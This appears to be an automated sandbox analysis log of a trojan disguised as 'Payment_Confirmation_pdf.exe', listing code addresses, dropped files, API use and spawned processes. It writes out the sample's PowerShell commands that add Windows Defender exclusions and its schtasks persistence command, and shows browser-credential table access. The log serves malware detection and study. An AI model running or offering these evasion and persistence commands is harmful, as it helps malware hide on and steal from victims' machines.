                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01450F3010_2_01450F30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01422FC810_2_01422FC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0143CFE010_2_0143CFE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014AEFA010_2_014AEFA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01430E5910_2_01430E59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014EEE2610_2_014EEE26
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014EEEDB10_2_014EEEDB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01442E9010_2_01442E90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014ECE9310_2_014ECE93
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014FB16B10_2_014FB16B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0146516C10_2_0146516C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0141F17210_2_0141F172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0143B1B010_2_0143B1B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014DF0CC10_2_014DF0CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014370C010_2_014370C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014E70E910_2_014E70E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014EF0E010_2_014EF0E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0141D34C10_2_0141D34C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014E132D10_2_014E132D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0147739A10_2_0147739A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144B2C010_2_0144B2C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014D12ED10_2_014D12ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014352A010_2_014352A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014E757110_2_014E7571
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014CD5B010_2_014CD5B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142146010_2_01421460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014EF43F10_2_014EF43F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014EF7B010_2_014EF7B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014E16CC10_2_014E16CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0143995010_2_01439950
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144B95010_2_0144B950
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014C591010_2_014C5910
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0149D80010_2_0149D800
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014338E010_2_014338E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014EFB7610_2_014EFB76
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A5BF010_2_014A5BF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0146DBF910_2_0146DBF9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144FB8010_2_0144FB80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014EFA4910_2_014EFA49
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014E7A4610_2_014E7A46
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A3A6C10_2_014A3A6C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014DDAC610_2_014DDAC6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014CDAAC10_2_014CDAAC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01475AA010_2_01475AA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01433D4010_2_01433D40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014E1D5A10_2_014E1D5A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014E7D7310_2_014E7D73
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144FDC010_2_0144FDC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A9C3210_2_014A9C32
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014EFCF210_2_014EFCF2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014EFF0910_2_014EFF09
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01431F9210_2_01431F92
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014EFFB110_2_014EFFB1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01439EB010_2_01439EB0
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeCode function: 11_2_01864B0111_2_01864B01
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeCode function: 11_2_0186D63C11_2_0186D63C
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeCode function: 11_2_0760774811_2_07607748
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeCode function: 11_2_0760968811_2_07609688
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeCode function: 11_2_0760773811_2_07607738
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeCode function: 11_2_076025E811_2_076025E8
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeCode function: 11_2_0760774811_2_07607748
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeCode function: 11_2_07602E4811_2_07602E48
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeCode function: 11_2_07602E5811_2_07602E58
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeCode function: 11_2_07603E9811_2_07603E98
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeCode function: 11_2_07602A2011_2_07602A20
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeCode function: 11_2_07602A1111_2_07602A11
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeCode function: 11_2_076049D011_2_076049D0
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeCode function: 11_2_0761C2EC11_2_0761C2EC
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeCode function: 11_2_0761004011_2_07610040
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeCode function: 11_2_0761E5C911_2_0761E5C9
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeCode function: 11_2_0761C2DD11_2_0761C2DD
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeCode function: 11_2_08F8733011_2_08F87330
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeCode function: 11_2_08F8AFE111_2_08F8AFE1
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeCode function: 11_2_08F8704811_2_08F87048
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeCode function: 11_2_08F8703711_2_08F87037
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeCode function: 11_2_08F8731F11_2_08F8731F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0114010017_2_01140100
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0119600017_2_01196000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_011D02C017_2_011D02C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0115053517_2_01150535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0117475017_2_01174750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0115077017_2_01150770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0114C7C017_2_0114C7C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0116C6E017_2_0116C6E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0116696217_2_01166962
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_011529A017_2_011529A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0115284017_2_01152840
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0115A84017_2_0115A840
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0118889017_2_01188890
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_011368B817_2_011368B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0117E8F017_2_0117E8F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0114EA8017_2_0114EA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0115AD0017_2_0115AD00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0115ED7A17_2_0115ED7A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01168DBF17_2_01168DBF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01158DC017_2_01158DC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0114ADE017_2_0114ADE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01150C0017_2_01150C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01140CF217_2_01140CF2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01170F3017_2_01170F30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01192F2817_2_01192F28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_011C4F4017_2_011C4F40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_011CEFA017_2_011CEFA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01142FC817_2_01142FC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01150E5917_2_01150E59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01162E9017_2_01162E90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0113F17217_2_0113F172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0118516C17_2_0118516C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0115B1B017_2_0115B1B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0113D34C17_2_0113D34C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_011533F317_2_011533F3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_011552A017_2_011552A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0116B2C017_2_0116B2C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0116D2F017_2_0116D2F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0114146017_2_01141460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0115349717_2_01153497
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_011974E017_2_011974E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0115B73017_2_0115B730
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0115995017_2_01159950
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0116B95017_2_0116B950
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0115599017_2_01155990
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_011BD80017_2_011BD800
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_011538E017_2_011538E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0116FB8017_2_0116FB80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0118DBF917_2_0118DBF9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_011C5BF017_2_011C5BF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_011C3A6C17_2_011C3A6C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01153D4017_2_01153D40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0116FDC017_2_0116FDC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_011C9C3217_2_011C9C32
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01169C2017_2_01169C20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01151F9217_2_01151F92
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01159EB017_2_01159EB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 011BEA12 appears 37 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0149EA12 appears 86 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01197E54 appears 97 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0141B970 appears 272 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01477E54 appears 101 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 014AF290 appears 105 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01465130 appears 58 times
                      Source: Payment_Confirmation_pdf.exeStatic PE information: invalid certificate
                      Source: Payment_Confirmation_pdf.exe, 00000000.00000002.1429945253.00000000075D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQNDp.exe: vs Payment_Confirmation_pdf.exe
                      Source: Payment_Confirmation_pdf.exe, 00000000.00000002.1421683345.00000000013CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Payment_Confirmation_pdf.exe
                      Source: Payment_Confirmation_pdf.exe, 00000000.00000000.1301713102.0000000000C52000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameQNDp.exe: vs Payment_Confirmation_pdf.exe
                      Source: Payment_Confirmation_pdf.exe, 00000000.00000002.1430554978.0000000008EF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShe vs Payment_Confirmation_pdf.exe
                      Source: Payment_Confirmation_pdf.exe, 00000000.00000002.1427083355.0000000004129000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Payment_Confirmation_pdf.exe
                      Source: Payment_Confirmation_pdf.exe, 00000000.00000002.1427083355.0000000004145000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Payment_Confirmation_pdf.exe
                      Source: Payment_Confirmation_pdf.exe, 00000000.00000002.1427083355.0000000004145000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Payment_Confirmation_pdf.exe
                      Source: Payment_Confirmation_pdf.exe, 00000000.00000002.1430090025.0000000007760000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Payment_Confirmation_pdf.exe
                      Source: Payment_Confirmation_pdf.exe, 00000000.00000002.1429337605.0000000005BC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Payment_Confirmation_pdf.exe
                      Source: Payment_Confirmation_pdf.exeBinary or memory string: OriginalFilenameQNDp.exe: vs Payment_Confirmation_pdf.exe
                      Source: Payment_Confirmation_pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Payment_Confirmation_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: cQwRvD.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.Payment_Confirmation_pdf.exe.4145828.1.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Payment_Confirmation_pdf.exe.5bc0000.4.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, UVSPe1HaZ7PT1moVSI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, XZoroxKebvtGCIPa9b.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, XZoroxKebvtGCIPa9b.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, XZoroxKebvtGCIPa9b.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, UVSPe1HaZ7PT1moVSI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, XZoroxKebvtGCIPa9b.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, XZoroxKebvtGCIPa9b.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, XZoroxKebvtGCIPa9b.csSecurity API names: _0020.AddAccessRule
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@25/16@9/5
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeFile created: C:\Users\user\AppData\Roaming\cQwRvD.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeMutant created: NULL
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeMutant created: \Sessions\1\BaseNamedObjects\hdhDxjDTpsD
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5108:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\tmp6A84.tmpJump to behavior
                      Source: Payment_Confirmation_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Payment_Confirmation_pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Payment_Confirmation_pdf.exe, 00000000.00000000.1301713102.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, cQwRvD.exe.0.drBinary or memory string: UPDATE [dbo].[adUsers] SET [samAccountName] = @samAccountName, [_dn] = @_dn, [phoneCorp] = @phoneCorp, [phoneMobile] = @phoneMobile, [IpPhone] = @IpPhone, [key_card] = @key_card WHERE (([id] = @Original_id) AND ([samAccountName] = @Original_samAccountName) AND ([_dn] = @Original__dn) AND ((@IsNull_phoneCorp = 1 AND [phoneCorp] IS NULL) OR ([phoneCorp] = @Original_phoneCorp)) AND ((@IsNull_phoneMobile = 1 AND [phoneMobile] IS NULL) OR ([phoneMobile] = @Original_phoneMobile)) AND ((@IsNull_IpPhone = 1 AND [IpPhone] IS NULL) OR ([IpPhone] = @Original_IpPhone)) AND ((@IsNull_key_card = 1 AND [key_card] IS NULL) OR ([key_card] = @Original_key_card)));
                      Source: sdiagnhost.exe, 00000013.00000003.1844372041.0000000000983000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2549013869.0000000000983000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2549013869.000000000098D000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2549013869.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000003.1844142956.0000000000962000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: Payment_Confirmation_pdf.exe, 00000000.00000000.1301713102.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, cQwRvD.exe.0.drBinary or memory string: INSERT INTO [dbo].[Employee_photo] ([Id], [SerialNumber], [ePhoto], [ePath], [id_empl]) VALUES (@Id, @SerialNumber, @ePhoto, @ePath, @id_empl);
                      Source: Payment_Confirmation_pdf.exeVirustotal: Detection: 39%
                      Source: Payment_Confirmation_pdf.exeReversingLabs: Detection: 34%
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeFile read: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe"
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cQwRvD.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\cQwRvD.exe C:\Users\user\AppData\Roaming\cQwRvD.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp9BD5.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeProcess created: C:\Windows\SysWOW64\sdiagnhost.exe "C:\Windows\SysWOW64\sdiagnhost.exe"
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe"Jump to behavior
